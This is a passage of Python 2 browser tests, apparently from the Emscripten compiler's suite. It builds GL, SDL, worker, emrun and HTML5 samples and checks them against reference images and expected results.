    self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'])

def test_gl_stride(self):
    """Stride handling with unsafe optimizations disabled."""
    self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'])

def test_gl_vertex_buffer_pre(self):
    """Vertex buffer setup performed before the main loop."""
    self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'])

def test_gl_vertex_buffer(self):
    """Vertex buffer rendering."""
    self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'], reference_slack=1)

def test_gles2_uniform_arrays(self):
    """GLES2 uniform arrays with GL assertions on; also proxied."""
    self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1'], expected=['1'], also_proxied=True)

def test_gles2_conformance(self):
    """GLES2 conformance checks with GL assertions on."""
    self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1'], expected=['1'])

def test_matrix_identity(self):
    """Identity-matrix handling in the legacy matrix emulation."""
    self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328'], args=['-s', 'LEGACY_GL_EMULATION=1'])

def test_cubegeom_pre(self):
    """Cube geometry, setup before the main loop."""
    self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

def test_cubegeom_pre2(self):
    """Cube geometry variant; also gives GL_DEBUG build coverage."""
    self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1']) # some coverage for GL_DEBUG not breaking the build

def test_cubegeom_pre3(self):
    """Third cube-geometry pre-loop variant."""
    self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

def test_cubegeom(self):
    """Main cube geometry test, optimized with debug info; also proxied."""
    self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)
def test_cubegeom_proc(self):
    """Cube geometry with GL functions fetched via SDL_GL_GetProcAddress from a side file.

    The side file declares a global named like a GL function to verify the
    name collision does not break the build. Runs at -O0 and -O1.
    """
    # 'with' ensures side.c is flushed and closed before EMCC compiles it.
    with open('side.c', 'w') as f:
        f.write(r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
  if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
  return glBindBuffer;
}
''')
    for opts in [0, 1]:
        self.btest('cubegeom_proc.c', reference='cubegeom.png', args=['-O' + str(opts), 'side.c', '-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_glew(self):
    """Cube geometry through GLEW, optimized with closure."""
    self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])

def test_cubegeom_color(self):
    """Cube geometry with per-vertex colors."""
    self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

def test_cubegeom_normal(self):
    """Cube geometry with normals; also proxied."""
    self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)

def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
    """Normals drawn from a direct client-side pointer (no element array buffer)."""
    self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)

def test_cubegeom_normal_dap_far(self): # indices do not start from 0
    """Direct-pointer draw whose indices do not start from 0."""
    self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
    """Same as above via glDrawRangeElements."""
    self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
    """Same as above via glDrawArrays."""
    self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
    """glDrawArrays variant using quads."""
    self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

def test_cubegeom_mt(self):
    """Cube geometry with multitexturing."""
    self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1']) # multitexture

def test_cubegeom_color2(self):
    """Second per-vertex color variant; also proxied."""
    self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)

def test_cubegeom_texturematrix(self):
    """Cube geometry using the texture matrix."""
    self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

def test_cubegeom_fog(self):
    """Cube geometry with fog."""
    self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

def test_cubegeom_pre_vao(self):
    """Pre-loop setup using a vertex array object."""
    self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

def test_cubegeom_pre2_vao(self):
    """Second VAO pre-loop variant."""
    self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

def test_cubegeom_pre2_vao2(self):
    """Third VAO pre-loop variant."""
    self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

def test_cube_explosion(self):
    """Exploding-cube animation; also proxied."""
    self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)

def test_glgettexenv(self):
    """glGetTexEnv query under legacy emulation."""
    self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1'], expected=['1'])

def test_sdl_canvas_blank(self):
    """A blank SDL canvas matches its reference."""
    self.btest('sdl_canvas_blank.c', reference='sdl_canvas_blank.png')

def test_sdl_canvas_palette(self):
    """Paletted SDL canvas rendering."""
    self.btest('sdl_canvas_palette.c', reference='sdl_canvas_palette.png')

def test_sdl_canvas_twice(self):
    """Rendering to the canvas twice."""
    self.btest('sdl_canvas_twice.c', reference='sdl_canvas_twice.png')

def test_sdl_set_clip_rect(self):
    """SDL_SetClipRect behavior."""
    self.btest('sdl_set_clip_rect.c', reference='sdl_set_clip_rect.png')

def test_sdl_maprgba(self):
    """SDL_MapRGBA color mapping."""
    self.btest('sdl_maprgba.c', reference='sdl_maprgba.png', reference_slack=3)

def test_sdl_create_rgb_surface_from(self):
    """SDL_CreateRGBSurfaceFrom with external pixel data."""
    self.btest('sdl_create_rgb_surface_from.c', reference='sdl_create_rgb_surface_from.png')

def test_sdl_rotozoom(self):
    """SDL_gfx rotozoom on a preloaded image."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
    self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png'], reference_slack=3)

def test_sdl_gfx_primitives(self):
    """SDL_gfx primitive drawing."""
    self.btest('sdl_gfx_primitives.c', reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
    """Paletted canvas rendering with copyOnLock disabled, checked per color channel.

    Writes a shared pre.js that turns off SDL's copy-on-lock, then for each
    of the r/g/b channels writes an arguments file and compares against the
    channel's reference image.
    """
    with open(os.path.join(self.get_dir(), 'pre.js'), 'w') as f:
        f.write('''
      Module['preRun'].push(function() {
        SDL.defaults.copyOnLock = false;
      });
    ''')
    # One args file + one render check per channel (was three copy-pasted blocks).
    for channel in ['r', 'g', 'b']:
        with open(os.path.join(self.get_dir(), 'args-%s.js' % channel), 'w') as f:
            f.write('''
      Module['arguments'] = ['-%s'];
    ''' % channel)
        self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_%s.png' % channel,
                   args=['--pre-js', 'pre.js', '--pre-js', 'args-%s.js' % channel])
def test_sdl_alloctext(self):
    """SDL text allocation under a small (8MB) heap."""
    self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=' + str(1024*1024*8)])

def test_sdl_surface_refcount(self):
    """SDL surface reference counting."""
    self.btest('sdl_surface_refcount.c', expected='1')

def test_sdl_free_screen(self):
    """Freeing the SDL screen surface."""
    self.btest('sdl_free_screen.cpp', reference='htmltest.png')

def test_glbegin_points(self):
    """glBegin/glEnd point rendering with a preloaded texture."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
    self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'])

def test_s3tc(self):
    """S3TC (DDS) compressed-texture loading."""
    shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
    self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1'])

def test_s3tc_ffp_only(self):
    """S3TC with the fixed-function-only emulation path."""
    shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
    self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1'])

def test_s3tc_crunch(self):
    """Crunch-compressed DDS assets packaged into one data file."""
    shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
    shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
    shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
    Popen([PYTHON, FILE_PACKAGER, 'test.data', '--crunch', '--preload', 'ship.dds', 'bloom.dds', 'water.dds'], stdout=open('pre.js', 'w')).communicate()
    assert os.stat('test.data').st_size < 0.5*(os.stat('ship.dds').st_size+os.stat('bloom.dds').st_size+os.stat('water.dds').st_size), 'Compressed should be smaller than dds'
    shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
    shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
    shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
    self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'pre.js', '-s', 'LEGACY_GL_EMULATION=1'])

def test_s3tc_crunch_split(self): # load several datafiles/outputs of file packager
    """Crunch-compressed assets split across two packaged data files."""
    shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
    shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
    shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
    Popen([PYTHON, FILE_PACKAGER, 'asset_a.data', '--crunch', '--preload', 'ship.dds', 'bloom.dds'], stdout=open('asset_a.js', 'w')).communicate()
    Popen([PYTHON, FILE_PACKAGER, 'asset_b.data', '--crunch', '--preload', 'water.dds'], stdout=open('asset_b.js', 'w')).communicate()
    shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
    shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
    shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
    self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'asset_a.js', '--pre-js', 'asset_b.js', '-s', 'LEGACY_GL_EMULATION=1'])

def test_aniso(self):
    """Anisotropic filtering; first validated as asm.js in spidermonkey when available."""
    if SPIDERMONKEY_ENGINE in JS_ENGINES:
        # asm.js-ification check
        Popen([PYTHON, EMCC, path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1']).communicate()
        Settings.ASM_JS = 1
        self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js', assert_returncode=None)
        print 'passed asm test'
    shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
    self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1'])

def test_tex_nonbyte(self):
    """Textures with non-byte component types."""
    self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

def test_float_tex(self):
    """Floating-point textures."""
    self.btest('float_tex.cpp', reference='float_tex.png')

def test_subdata(self):
    """glBufferSubData updates."""
    self.btest('gl_subdata.cpp', reference='float_tex.png')

def test_perspective(self):
    """Perspective projection under legacy emulation."""
    self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_runtimelink(self):
    """Runtime linking via BUILD_AS_SHARED_LIB=2 (deprecated; skipped unconditionally)."""
    return self.skip('BUILD_AS_SHARED_LIB=2 is deprecated')
    # NOTE: everything below is intentionally unreachable, kept for reference.
    main, supp = self.setup_runtimelink_test()
    open(self.in_dir('supp.cpp'), 'w').write(supp)
    Popen([PYTHON, EMCC, self.in_dir('supp.cpp'), '-o', 'supp.js', '-s', 'LINKABLE=1', '-s', 'NAMED_GLOBALS=1', '-s', 'BUILD_AS_SHARED_LIB=2', '-O2', '-s', 'ASM_JS=0']).communicate()
    shutil.move(self.in_dir('supp.js'), self.in_dir('supp.so'))
    self.btest(main, args=['-s', 'LINKABLE=1', '-s', 'NAMED_GLOBALS=1', '-s', 'RUNTIME_LINKED_LIBS=["supp.so"]', '-DBROWSER=1', '-O2', '-s', 'ASM_JS=0'], expected='76')
def test_pre_run_deps(self):
    """A run dependency added in preRun must delay run() until it is removed."""
    # Adding a dependency in preRun will delay run
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
      Module.preRun = function() {
        addRunDependency();
        Module.print('preRun called, added a dependency...');
        setTimeout(function() {
          Module.okk = 10;
          removeRunDependency()
        }, 2000);
      };
    ''')
    # Check with and without a memory init file.
    for mem in [0, 1]:
        self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
def test_mem_init(self):
    """Writing to memory before the memory init file arrives.

    With assertions the early write is detected (result 9); without, it is
    silently overwritten by the arriving init data (result 3).
    """
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
      function myJSCallback() { // called from main()
        Module._note(1);
      }
      Module.preRun = function() {
        addOnPreMain(function() {
          Module._note(2);
        });
      };
    ''')
    open(os.path.join(self.get_dir(), 'post.js'), 'w').write('''
      var assert = function(check, text) {
        if (!check) {
          var xhr = new XMLHttpRequest();
          xhr.open('GET', 'http://localhost:8888/report_result?9');
          xhr.onload = function() {
            window.close();
          };
          xhr.send();
        }
      }
      Module._note(4); // this happens too early! and is overwritten when the mem init arrives
    ''')
    # with assertions, we notice when memory was written to too early
    self.btest('mem_init.cpp', expected='9', args=['--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
    # otherwise, we just overwrite
    self.btest('mem_init.cpp', expected='3', args=['--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
def test_runtime_misuse(self):
    """Calling into compiled code before the runtime is ready, or after it exits.

    Builds JS snippets that invoke ccall/cwrap/direct calls at various
    lifecycle points and verifies they abort (with assertions) before the
    runtime is up, succeed when it is alive, and behave as expected after exit.
    """
    # Helpers the test snippets share: three ways of calling into the module.
    post_prep = '''
      var expected_ok = false;
      function doCcall(n) {
        ccall('note', 'string', ['number'], [n]);
      }
      var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
      function doCwrapCall(n) {
        var str = wrapped(n);
        Module.print('got ' + str);
        assert(str === 'silly-string');
      }
      function doDirectCall(n) {
        Module['_note'](n);
      }
    '''
    # Each call must throw while the runtime is not ready (expected_ok false).
    post_test = '''
      var ok = false;
      try {
        doCcall(1);
        ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
      } catch(e) {
        Module.print('expected fail 1');
        assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
        ABORT = false; // hackish
      }
      assert(ok === expected_ok);
      ok = false;
      try {
        doCwrapCall(2);
        ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
      } catch(e) {
        Module.print('expected fail 2');
        assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
        ABORT = false; // hackish
      }
      assert(ok === expected_ok);
      ok = false;
      try {
        doDirectCall(3);
        ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
      } catch(e) {
        Module.print('expected fail 3');
        assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
        ABORT = false; // hackish
      }
      assert(ok === expected_ok);
    '''
    # Valid calls from inside main, plus a late _free call after runtime exit.
    post_hook = r'''
      function myJSCallback() {
        // called from main, this is an ok time
        doCcall(100);
        doCwrapCall(200);
        doDirectCall(300);
      }
      setTimeout(Module['_free'], 1000); // free is valid to call even after the runtime closes
    '''
    open('pre_main.js', 'w').write(r'''
      Module._main = function(){
        myJSCallback();
        return 0;
      };
    ''')
    open('pre_runtime.js', 'w').write(r'''
      Module.onRuntimeInitialized = function(){
        myJSCallback();
      };
    ''')
    # (filename, extra build args, expected code for the late-call scenario)
    for filename, extra_args, second_code in [
        ('runtime_misuse.cpp', [], 600),
        ('runtime_misuse_2.cpp', ['--pre-js', 'pre_main.js'], 600),
        ('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
    ]:
        print '\n', filename, extra_args
        print 'mem init, so async, call too early'
        open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + post_test + post_hook)
        self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1'] + extra_args)
        print 'sync startup, call too late'
        open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook);
        self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '--memory-init-file', '0'] + extra_args)
        print 'sync, runtime still alive, so all good'
        open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook);
        self.btest(filename, expected='606', args=['--post-js', 'post.js', '--memory-init-file', '0', '-s', 'NO_EXIT_RUNTIME=1'] + extra_args)
def test_worker_api(self):
    """Worker API: build a BUILD_AS_WORKER module and call its exported function."""
    Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
    self.btest('worker_api_main.cpp', expected='566')

def test_worker_api_2(self):
    """Worker API with several exported functions, in an optimized unminified build."""
    Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]']).communicate()
    self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')

def test_worker_api_3(self):
    """Third worker API variant."""
    Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
    self.btest('worker_api_3_main.cpp', expected='5')

def test_emscripten_async_wget2(self):
    """emscripten_async_wget2 HTTP fetch."""
    self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])

def test_module(self):
    """SIDE_MODULE/MAIN_MODULE dlopen support (non-fastcomp only)."""
    def nfc():
        Popen([PYTHON, EMCC, path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]']).communicate()
        self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1'], expected='8')
    nonfastcomp(nfc)
def test_mmap_file(self):
    """mmap of a preloaded data file, with and without --no-heap-copy."""
    # 'with' ensures the data file is flushed before it is preloaded.
    with open(self.in_dir('data.dat'), 'w') as f:
        f.write('data from the file ' + ('.' * 9000))
    for extra_args in [[], ['--no-heap-copy']]:
        self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
def test_emrun_info(self):
    """emrun --system_info/--browser_info/--list_browsers run without tracebacks."""
    result = subprocess.check_output([PYTHON, path_from_root('emrun'), '--system_info', '--browser_info'])
    assert 'CPU' in result
    assert 'Browser' in result
    assert 'Traceback' not in result
    result = subprocess.check_output([PYTHON, path_from_root('emrun'), '--list_browsers'])
    assert 'Traceback' not in result
def test_emrun(self):
    """Run a --emrun build under emrun and verify exit code, argv forwarding and both log streams."""
    Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_exit.c'), '--emrun', '-o', 'hello_world.html']).communicate()
    outdir = os.getcwd()
    # We cannot run emrun from the temp directory the suite will clean up afterwards, since the browser that is launched will have that directory as startup directory,
    # and the browser will not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to delete it. Therefore switch away from that directory
    # before launching.
    os.chdir(path_from_root())
    args = [PYTHON, path_from_root('emrun'), '--timeout', '30', '--verbose', '--log_stdout', os.path.join(outdir, 'stdout.txt'), '--log_stderr', os.path.join(outdir, 'stderr.txt'), os.path.join(outdir, 'hello_world.html'), '1', '2', '--3']
    if emscripten_browser is not None:
        args += ['--browser', emscripten_browser]
    process = subprocess.Popen(args)
    process.communicate()
    # Close the log files promptly instead of leaking the handles (the original
    # open(...).read() never closed them, which matters on Windows).
    with open(os.path.join(outdir, 'stdout.txt'), 'r') as f:
        stdout = f.read()
    with open(os.path.join(outdir, 'stderr.txt'), 'r') as f:
        stderr = f.read()
    assert process.returncode == 100
    assert 'argc: 4' in stdout
    assert 'argv[3]: --3' in stdout
    assert 'hello, world!' in stdout
    assert 'hello, error stream!' in stderr
def test_uuid(self):
    # Run with ./runner.py browser.test_uuid
    # We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
    # high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
    # First run tests in Node and/or SPIDERMONKEY using run_js. Use closure compiler so we can check that
    # require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
    Popen([PYTHON, EMCC, '-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js'], stdout=PIPE, stderr=PIPE).communicate()
    test_js_closure = open('test.js').read()
    # Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
    assert ").randomBytes" in test_js_closure
    assert "window.crypto.getRandomValues" in test_js_closure
    out = run_js('test.js', full_output=True)
    print out
    # Tidy up files that might have been created by this test.
    try_delete(path_from_root('tests', 'uuid', 'test.js'))
    try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
    # Now run test in browser
    self.btest(path_from_root('tests', 'uuid', 'test.c'), '1')
def test_glew(self):
    """GLEW in all four combinations of LEGACY_GL_EMULATION and GLEW_MX."""
    self.btest(path_from_root('tests', 'glew.c'), expected='1')
    self.btest(path_from_root('tests', 'glew.c'), args=['-s', 'LEGACY_GL_EMULATION=1'], expected='1')
    self.btest(path_from_root('tests', 'glew.c'), args=['-DGLEW_MX'], expected='1')
    self.btest(path_from_root('tests', 'glew.c'), args=['-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
    """Regression test: adding/removing a run dependency from preRun must not start main() twice."""
    # Write pre.js via a context manager so the handle is flushed and closed
    # before the build reads it (original open(...).write(...) leaked it).
    with open('pre.js', 'w') as f:
        f.write(r'''
if (typeof Module === 'undefined') Module = eval('(function() { try { return Module || {} } catch(e) { return {} } })()');
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
Module['addRunDependency']('test_run_dependency');
Module['removeRunDependency']('test_run_dependency');
});
''')
    self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
def test_html5(self):
    """HTML5 API bindings at default and optimised/closure build settings."""
    for opts in [[], ['-O2', '-g1', '--closure', '1']]:
        print opts
        self.btest(path_from_root('tests', 'test_html5.c'), args=opts, expected='0')
def test_html5_webgl_create_context(self):
    """emscripten_webgl_create_context across plain, optimised/closure and FULL_ES2 builds."""
    for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
        print opts
        self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts, expected='0')
def test_sdl_touch(self):
    """SDL touch events; AUTOMATE_SUCCESS drives the test without real input."""
    for opts in [[], ['-O2', '-g1', '--closure', '1']]:
        print opts
        self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_html5_mouse(self):
    """HTML5 mouse events; AUTOMATE_SUCCESS drives the test without real input."""
    for opts in [[], ['-O2', '-g1', '--closure', '1']]:
        print opts
        self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
    """SDL mouse-wheel events; AUTOMATE_SUCCESS drives the test without real input."""
    for opts in [[], ['-O2', '-g1', '--closure', '1']]:
        print opts
        self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_codemods(self):
    """PRECISE_F32 codemods: verify results differ depending on build flags, on whether the
    browser provides Math.fround, and on client-side removal of fround calls."""
    for opt_level in [0, 2]:
        print 'opt level', opt_level
        opts = '-O' + str(opt_level)
        # sanity checks, building with and without precise float semantics generates different results
        self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts])
        self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=[opts, '-s', 'PRECISE_F32=1'])
        self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=[opts, '-s', 'PRECISE_F32=2']) # empty polyfill, but browser has support, so semantics are like float
        # now use a shell to remove the browser's fround support
        open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', '''
Math.fround = null;
var Module = {
'''))
        self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts, '--shell-file', 'shell.html'])
        self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=[opts, '--shell-file', 'shell.html', '-s', 'PRECISE_F32=1'])
        self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts, '--shell-file', 'shell.html', '-s', 'PRECISE_F32=2']) # empty polyfill, no browser support, so semantics are like double
        # finally, remove fround, patch up fround as the code executes (after polyfilling etc.), to verify that we got rid of it entirely on the client side
        fixer = 'python fix.py'
        open('fix.py', 'w').write(r'''
import sys
filename = sys.argv[1]
js = open(filename).read()
replaced = js.replace("var Math_fround = Math.fround;", "var Math_fround = Math.fround = function(x) { return 0; }")
assert js != replaced
open(filename, 'w').write(replaced)
''')
        self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts, '--shell-file', 'shell.html', '--js-transform', fixer]) # no fround anyhow
        self.btest(path_from_root('tests', 'codemods.cpp'), expected='121378', args=[opts, '--shell-file', 'shell.html', '--js-transform', fixer, '-s', 'PRECISE_F32=1']) # proper polyfill was enstated, then it was replaced by the fix so 0 is returned all the time, hence a different result here
        self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts, '--shell-file', 'shell.html', '--js-transform', fixer, '-s', 'PRECISE_F32=2']) # we should remove the calls to the polyfill ENTIRELY here, on the clientside, so we should NOT see any calls to fround here, and result should be like double
def test_wget(self):
    """emscripten_wget with ASYNCIFY, fetching a small local file."""
    with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
        f.write('emscripten')
    self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1'])
def test_locate_file(self):
    """Module.locateFile must redirect loads of the .mem and .data files into a subdirectory."""
    self.clear()
    open('src.cpp', 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT();
return 0;
}
'''))
    open('data.txt', 'w').write('load me right before...')
    open('pre.js', 'w').write('Module.locateFile = function(x) { return "sub/" + x };')
    Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w')).communicate()
    # put pre.js first, then the file packager data, so locateFile is there for the file loading code
    Popen([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html']).communicate()
